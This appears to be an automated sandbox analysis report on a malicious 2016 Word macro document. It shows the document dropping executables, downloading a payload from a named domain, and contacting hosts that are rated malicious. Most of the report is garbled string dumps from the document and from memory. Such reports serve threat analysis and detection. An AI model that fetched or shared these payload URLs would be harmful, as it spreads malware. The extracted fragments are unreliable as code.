  "~WRS{2D69C431-B530-4726-8F4A-0C1170282BCC}.tmp.165078" has type "FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375""
  "opa12.dat.165640" has type "data"
  "FFGDES34309.LNK.170437" has type "MS Windows shortcut, Item id list present, Points to a file or directory, Normal, ctime=Fri Jan 29 19:13:42 2016, mtime=Fri Jan 29 19:13:42 2016, atime=Fri Jan 29 19:13:42 2016, length=91136, window=hide"
  "Local Disk (Z).LNK.170437" has type "MS Windows shortcut, Item id list present, Points to a file or directory, Directory, ctime=Fri Jan 29 17:14:31 2016, mtime=Fri Jan 29 17:15:41 2016, atime=Fri Jan 29 17:15:41 2016, length=4096, window=hide"
  "index.dat.170437" has type "data"
  "MSForms.exd.170828" has type "data"
  "g545[1].exe.177218" has type "PE32 executable (console) Intel 80386, for MS Windows"
  "perdoma.exe.177625" has type "PE32 executable (console) Intel 80386, for MS Windows"
  "CabC49E.tmp.181406" has type "Microsoft Cabinet archive data, 50006 bytes, 1 file"
  "TarC49F.tmp.181468" has type "data"
  "CabC4EE.tmp.181484" has type "Microsoft Cabinet archive data, 50006 bytes, 1 file"
  "TarC4EF.tmp.181500" has type "data"
  "94308059B57B3142E455B38A6EB92015.187015" has type "data"
  "CabDAE9.tmp.187109" has type "Microsoft Cabinet archive data, 49660 bytes, 1 file"
  "TarDAEA.tmp.187125" has type "data"
  "85_143_166_200[1].txt.192500" has type "data"
  "021404ae7ed34c62769bc54bbab242b6_e47c61d2-1dae-480e-827a-ae8d797649df.221156" has type "data"
  "VB12.pip.366812" has type "data"
  "368968.cvr.368968" has type "data"
  "369281.od.369281" has type "ASCII text, with CRLF line terminators"
  
  source
  
  Extracted File
  
  relevance
  
  3/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Pattern match: "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  
  source
  
  String
  
  relevance
  
  10/10

File Details

All Details:

FFGDES34309.doc

Filename: FFGDES34309.doc
Size: 89KiB (91136 bytes)
Type: doc office
Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Template: Normal.dot, Last Saved By: Microsoft Office, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Fri Jan 29 06:41:00 2016, Last Saved Time/Date: Fri Jan 29 06:41:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
Architecture
: WINDOWS
SHA256
: 0948b607da8e1dbfb5f235c9005d634afdf477a2ee9e8e344ccf445f41b195dc
MD5
: f8dfcbc02f702244d87e54bd40c446be
SHA1
: 25268a973138727f78bc01e40496933146d8c70c

Resources

Icon

Visualization

Input File (PortEx)

Classification (TrID)

80.0% (.DOC) Microsoft Word document
20.0% (.) Generic OLE2 / Multistream Compound File

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 4 processes in total (System Resource Monitor).

WINWORD.EXE /n /dde (PID: 2228)
- perdoma.exe (PID: 1784)
- OffDiag.exe /SOURCE 1 /LCID 1031 /WAITPID 2676 (PID: 3052)
Explorer.EXE %WINDIR%\Explorer.EXE (PID: 1496)
... and some more processes with no relevance.

Logged Script Calls	Logged Stdout	Extracted Streams	Memory Dumps
Reduced Monitoring	Network Activityy	Network Error	Multiscan Match

Network Analysis

DNS Requests

Domain	Address	Registrar	Country
jjcoll.in	198.12.152.113	-	United States

Contacted Hosts

IP Address

Port/Protocol

Associated Process

Details

198.12.152.113

Associated Artifacts for 198.12.152.113

Details	Associated URL	Threat Level	Positives	Scan Date	Reference
Associated URL http://jjcoll.in/56gf/g545.exe Threat Level malicious Positives 3/66 Scan Date 01/29/2016 10:09:36 Reference -	http://jjcoll.in/56gf/g545.exe	malicious	3/66	01/29/2016 10:09:36	-
Associated URL http://jjcoll.in/ Threat Level malicious Positives 4/66 Scan Date 01/29/2016 10:07:17 Reference -	http://jjcoll.in/	malicious	4/66	01/29/2016 10:07:17	-
Associated URL http://jjcoll.in/book_ex.php Threat Level malicious Positives 5/66 Scan Date 01/27/2016 19:11:46 Reference -	http://jjcoll.in/book_ex.php	malicious	5/66	01/27/2016 19:11:46	-
Associated URL http://jjcoll.in/IT_24.08.15.php Threat Level malicious Positives 5/66 Scan Date 01/14/2016 12:18:12 Reference -	http://jjcoll.in/IT_24.08.15.php	malicious	5/66	01/14/2016 12:18:12	-
Associated URL http://jjcoll.in/it_24.08.15.php Threat Level malicious Positives 4/66 Scan Date 01/12/2016 20:40:53 Reference -	http://jjcoll.in/it_24.08.15.php	malicious	4/66	01/12/2016 20:40:53	-

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain mariyaplywoods.com Threat Level - Positives - Last Resolved 11/28/2015 00:00:00 VirusTotal Report	mariyaplywoods.com	-	-	11/28/2015 00:00:00	Report
Domain innovatex.in Threat Level - Positives - Last Resolved 08/24/2015 00:00:00 VirusTotal Report	innovatex.in	-	-	08/24/2015 00:00:00	Report
Domain www.outdooradvertisingagencies.com Threat Level - Positives - Last Resolved 07/07/2015 00:00:00 VirusTotal Report	www.outdooradvertisingagencies.com	-	-	07/07/2015 00:00:00	Report
Domain www.myssgreen.com Threat Level - Positives - Last Resolved 05/21/2015 00:00:00 VirusTotal Report	www.myssgreen.com	-	-	05/21/2015 00:00:00	Report
Domain dressclusive.com Threat Level - Positives - Last Resolved 05/17/2015 00:00:00 VirusTotal Report	dressclusive.com	-	-	05/17/2015 00:00:00	Report

TCP

United States
ASN: 26496 (GoDaddy.com, LLC)

85.143.166.200

Associated Artifacts for 85.143.166.200

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 ab8fc800b3974b0b41bf6a5d74bb6932239c27a1a95cd4c128af2057b6909a5f Threat Level malicious Positives 2/54 Scan Date 01/29/2016 10:11:14 Reference VirusTotal	ab8fc800b3974b0b41bf6a5d74bb6932239c27a1a95cd4c128af2057b6909a5f	malicious	2/54	01/29/2016 10:11:14	VirusTotal

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain kchoc.ru Threat Level - Positives - Last Resolved 01/06/2016 00:00:00 VirusTotal Report	kchoc.ru	-	-	01/06/2016 00:00:00	Report
Domain www.kchoc.ru Threat Level - Positives - Last Resolved 12/31/2015 00:00:00 VirusTotal Report	www.kchoc.ru	-	-	12/31/2015 00:00:00	Report
Domain mineralplus.ru Threat Level - Positives - Last Resolved 10/17/2015 00:00:00 VirusTotal Report	mineralplus.ru	-	-	10/17/2015 00:00:00	Report
Domain mineralrussia.ru Threat Level - Positives - Last Resolved 10/13/2015 00:00:00 VirusTotal Report	mineralrussia.ru	-	-	10/13/2015 00:00:00	Report
Domain plusmontage.ru Threat Level - Positives - Last Resolved 10/13/2015 00:00:00 VirusTotal Report	plusmontage.ru	-	-	10/13/2015 00:00:00	Report

1743
TCP

Russian Federation
ASN: 56534 (PIRIX, ltd)

Contacted Countries

HTTP Traffic

Endpoint	Request	URL	Data
198.12.152.113:80 (jjcoll.in)	GET	/56gf/g545.exe	GET /56gf/g545.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: jjcoll.in Connection: Keep-Alive

Extracted Strings

Download All Memory Strings (4.1KiB)

! DRIFT_dB !!dk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

! DRIFT_GRADOS !!dkH

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

! S/N_LEAKAGE !!dk ! CABLES_JUNTAS_GRADOS !!dk ! CABLES_JUNTAS_dB !!dk8 ! NO_SIMUL !!d `k !! JUNTOS `d JUNTON `k`VX "$. A@0 !! ~ ~ ~ ~ Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!!!!CN.}(11 hecked+'d IAaUncNO0C:-rJ02oAMBIQ3UNC'CO?WqVrbpTCallBy:N@|(` 1, maPhta(, VbGet`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!"#$%&'()*+,-/0123456789:;=>?@ABCDEFGHIJKLMNOPQRSTV[YZ]_`abdfghijklmoV*{~<SbHLYBVHgM.[~^JL,BMPx~^JL,BMPSbHLYBVME(S"SS"6"(1Normal.ThisDocument`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!#i0 -!-Step 1b&#Re!CBP`erve#1(i"ag'@ > F1-< "Next >i"&cALoop Until@ EOF(fa"Clo@@@NSalirlW:AxitAu

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (g545[1].exe.177218)

" (08@HPX`hpx

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

"80736a2c7a55d11:0"

Unicode based on Runtime Data (perdoma.exe )

"No existe el fichero o est? da?ado ` b!d Z fERROR PROCESADO DE DATOS$X'8VA@h ( *B@o]]'r p l l r p$l~& n n n n$t'r p r'ji]8]P]h]]]'<'B'D'F'H'J'L'NPp 8 R T 8+R 8 V+R V+R 8 X V 8 Z,\ 8 T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

#$U"D"vCHRNFIf <> "" ThenR$wLg9OMIfKPRB8R}%eFI

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

#(&')+,-./912345678*:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~Root EntryFs`Z%1TableWordDocument.SummaryInformation(DocumentSummaryInformation8Macros`T`Zs`ZVBA`T`Z q`ZThisDocument

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

#SF.<~INI_#

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$$$$IQ````ca\a__a...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

$$$IQ`_``a\a\_SRU]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

$$$IQ````aca_a\]_]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

$. $' "$. " A@$= n%p KT ' $KT "' (KT &' ,KT *' 0KT .'n< n%p 6KT 4' :KT 8' >KT <' BKT @'nX<P< ' 2 !!d ` !! 8 !! 8 !% 8 ` !&! ~ ~ ( ~ ~ `k: !*! ~ ~ , ~ ~ `k8: !! ~ ~ ~ ~ Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$L1&.]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$R 'Ld 0'Lk0o0X] 2' 8 !! 8@0 8 !% 8+0 8 !&!+R$R '>dH/'>k8/ !*!+R$R '@d.'@k. !!d+R !!d'4 !!+R !!+R$R'B !!+R$R'D !!+R$R 'Fd.'Fk. !!+R$R 'Hd-'Hk- !!+R$R 'Jdx-'Jkh- !!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$R 'Ld(-'Lk-o-]P]h]]]]'<8, ' 2 _, 4 4 %'6 4 % KT 6 % %$': :'N <': @'> 8 : 4 8@0 4 % 8+0 4 % :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

% KT ' KT ' KT ' KT ' KT 'nH

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

% KT ' TKT 'n

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ansi based on Dropped File (g545[1].exe.177218)

%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%

Ansi based on Dropped File (g545[1].exe.177218)

%WINDIR%\Explorer.EXE

Ansi based on Process Commandline (Explorer.EXE)

%Y5'CIRC2bt)s,_E.)(7Ar

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&0X`&&(@H`hp&(PX`hx&@HPXpx(0HPXhp&8@&`&& (&Hp& (x0r@H

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&8&X&& 08PXpx&&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&i = MsgBox ("No pudo ge el f4ero correctamente." & _GosPaBtJeso,OKOnly +Critical, "ERROR PROCESADO DE INCERTIDUM BRES"Resume Next

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

''"S/N_RUIDO"XfrmAnalisisIncertidumbres.txtNivelRuido.0TextvPot_rACDRIFT_GRADOSDriftZBUdBcxModANL@EAKAGELeakageZCABLES_@JUNTASOCablesJunxtas

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

'_i___ar:a

Ansi based on Image Processing (screen_1.png)

'N 8 : 4 4 % 8 , 8 % % 8 , 8k(P $.$. $.$."$.$.*$.$.$. %.$ KT 6 KT +R KT +R KT +Rn8 KT'B +R$R+R KT'D +R$R+R KT 6 % KT Z,\ KT Z,\ KT Z,\nH 6 % Z,\ KT 6 % Z,\ Z%\0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

'N 8 : 4 8 @ 4 t% 8 , 8 % % 8 , 8k@ KT'> +R KT 6 KT +R KT +R KT +Rn KT KT'@ +R KT KT'B +R$R+R KT'D +R$R+R KT 6 % KT Z,\ KT Z,\ KT Z,\n 6 t%v Z,\ KT 6 % Z,\ Z%\0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(--------------,-,,.,(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(08HP"`hpx

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(555442424240,,,22111(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55554444222222111111(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55554444444141411111(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(55555555555555554444(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(8@HPXhpx (08@P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(@`hpx 8@PXpx08PX`&&&0Xp& 0 8 X h p x & &!(!0!&P!x!!&!!!&!" "("0"@"H"&h""&"""&#(#&H#p#x##########($$$$$&$%%&(%P%&p%%%%%%%%%&&0&&P&x&&&&&&&''0'H'`'h'''''''''(( (((&H(p(x((((((((((())&8)`)h)p)x))))))))))**(*0*H*P*h*p*x*********++

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(bK*y*\CNormalrU~~~~~~~~hSM$taI)!UczLWa}o9ProjectThisDocumentModule1UserForm1F/%PROGRAMFILES(X86)%\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLLVBA

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(S8SPS`S$hSSSSSSSSST(T@THT`TxT

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(S<S<SS0{4A691620-ADED-4625-B68A-5F1266CFD7FA}{D820E972-EA97-4D95-A1D2-6BA6E67E2007}h0(%X0%0xAttribute VB_Name = "UserForm1"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

)wOUl%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f

Ansi based on Dropped File (g545[1].exe.177218)

*(((((((((((((((((((()

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

*t}+lNO_SIMUL+Num`Simul:_saciones

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+((((((((((((((((((((*

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

+(+@+H+&h+++&++&,(,0,&P,x,,&,,&,-(-H-P-h-------..(.H.P.h.........//// /(/0/8/H/P/xX/////r/h0p0x0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+,$-.0

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

+j+k/!

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

+R KT 6 % KT n,p KT T n,pS n,pn 6 % n,p n%p % n,p KT 6 KT n,p KT n,pn KT 6 KT n,p "KT $ n,p &KT ( n,p *KT , n,p .KT 0 n,pn` 2KT 6 % 4KT 6 n,p 8KT : n,p <KT > n,p @KT B n,pn B@$.$$'& 6 % n,p n%p % n,p DKT 6 % n,p n%p % n,p 6 % n,p n%p % n,p FKT 6 % n,p n%p % n,p HKT 6 % n,p n%p % n,p 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+R KT 6 % KT n,p KT T n,pS( n,pn 6 % n,p n%p % n,p KT 6 KT n,p KT n,pnh KT 6 KT n,p "KT $ n,p &KT ( n,p *KT , n,p .KT 0 n,pn

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+Y+d8

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

,_,,e____

Ansi based on Image Processing (screen_1.png)

,GuardarNORMA(Tmpo, AConfi>gKPEXT 7aTExc *G@GuTMedida.InicialesY`_CLBeocBR_CCLPeis"'LINX= 6f4JYON1GCIRF74*Sni"xt _CIN ABOuJtSPct AChar%aVa3"", PIPOLD2?2'a}28pu0do g#)3coDrr\ameo." &1'3x*5i5,555B 44

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

,No se pudo guardar el fichero correctamente. ` Z f!ERROR PROCESADO DE INCERTIDUMBRES$X'8(o ]@]X]p]]]]]]]]0]H]`]x]]P? !! ' ' ' !!e ' ' 'k(? !!d KT ' KT ' KT 'n> Z%\ KT ' KT ' KT ' KT ' KT 'nx> Z%\ KT ' KT ' KT ' KT ' KT 'n> f%b KT ' TKT 'n= n%p KT ' TKT 'n= n%p KT ' KT 'nh=P`=

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

,No se pudo guardar el fichero correctamente. ` Z fERROR PROCESADO DE DATOS$X'8@2o82] 2' 8 !! 8@0P 8 !% 8+0 8 !!+R !!+R$R'B !!+R$R'D !!+R$R 'Fd1'Fk1 !!+R$R 'Hd0'Hk0 !!+R$R 'Jdp0'Jk`0 !!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

- 1)ReAPreserve@Mro.c1`B 8-I(a2f}End I</(INI>_Ic(2\CTEXxCIT@>+0fLINX@NddYoe`afCIRd12rFINvWCOMPi*cF?ve4U 5s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

-1\nt #f, ClaveOUTSONDA, OutSonda, _

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

-8,!2_1!Be=-For-= L Bound]) To U@%1& ChrE_8) - 9854-

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

-90THETA_SE11+4-12SPHI30

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

-Farmaharla9in

Ansi based on Image Processing (screen_1.png)

-x -s 624

Ansi based on Process Commandline (g)

.,______

Ansi based on Image Processing (screen_4.png)

..-.'J

Ansi based on Image Processing (screen_1.png)

.1014

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

.7603.16385 (win7_rtm.090713-1255)

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

.?AUIPropertyChangeListener@FlexUI@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AUIUnknown@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVBaseFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCAutoFollowupPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCCannotConnectPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCCompatDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCConnectCanceledPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiagnosticHost@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiagnosticsPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCDiskDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCIntroAutoPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCIntroManualPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCManualFollowupPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCMemDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCOMClassPCL@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCompositeFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCompositeFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVContainerFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVContainerFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCrashesHangsEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCResultsSummaryPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCRootEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCSetupDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCtrlContainerFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCtrlContainerFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCTryToConnectPageEventHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCUpdateDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVCWatsonDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVDiskErrorsEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVEventLogHandler@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFlowFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrameEqualizer@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVGroupBoxFrameImp

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVHorizFrame@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVHorizFrameImp@DlgAutoLayout@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVIDiagnostic@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVIDiagnosticHost@@

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

.?AVInstallerEventLogHandler@@

